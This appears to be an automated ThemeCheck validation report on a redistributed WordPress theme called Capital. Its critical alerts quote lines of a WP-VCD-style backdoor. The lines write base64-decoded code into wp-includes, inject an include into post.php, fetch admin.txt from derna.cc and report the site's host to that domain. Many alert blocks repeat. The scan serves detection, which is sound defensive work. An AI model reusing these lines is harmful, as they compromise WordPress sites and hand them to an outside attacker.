0
Validation results

Capital | Shared By VestaThemes.com

Capital | Shared By VestaThemes.com

WordPress 4.9.5 theme
0
    Error 8 : Undefined index: slug
    In /home/www/themecheck/themecheck/controllers/controller_results.php line 772
  • THEME TYPEWordPress theme 4.9.5
  • FILE NAMEcapital.zip
  • FILE SIZE14026834 bytes
  • MD5a3cbb163d4471e613c258f16090c1b43
  • SHA1434456291566cded35d048930aa9d523528ac2cd
  • LICENSECustom
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • THEME URIhttps://capital.imithemes.com
  • VERSION1.4
  • CREATION DATE2017-11-16
  • LAST FILE UPDATE2017-11-16
  • LAST VALIDATION2017-11-16 09:11
  • OTHER VERSIONS

    1.3.3 : 0%

    1.1.2 : 0%

Critical alerts
  1. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php.
    Line 5: ini_set('display_errors', 0);
  2. Security breaches : Use of base64_decode() Found base64_decode in file class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 91: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  3. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe itemprop="video" src="//www.youtube.com/embed/' . $video_id . '?wmode=transparent&autoplay=0" width="' . $width . '" height="' . $height . '" > in file theme-functions.php.
    Line 137: return '<iframe itemprop='video' src='//www.youtube.com/embed/' . $video_id . '?wmo
  4. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER['HTTP_HOST']
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
  5. Admin menu : Themes should use add_theme_page() for adding admin pages. File barebones-config.php :
    Line 67: // For a full list of options, visit: http://codex.wordpress.org/Function_Reference/add_submenu_page#Parameters
  6. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was capital-core.zip revslider.zip js_composer.zip.
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is capital-shared-by-vestathemes-com.
  3. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  4. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  5. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  7. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  8. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  9. Optional files : Presence of archive template file archive.phpThis theme does not contain optional file archive.php.
  10. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  12. Use of includes : Use of include or requireThe theme appears to use include or require : class.theme-modules.php
    Line 44: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes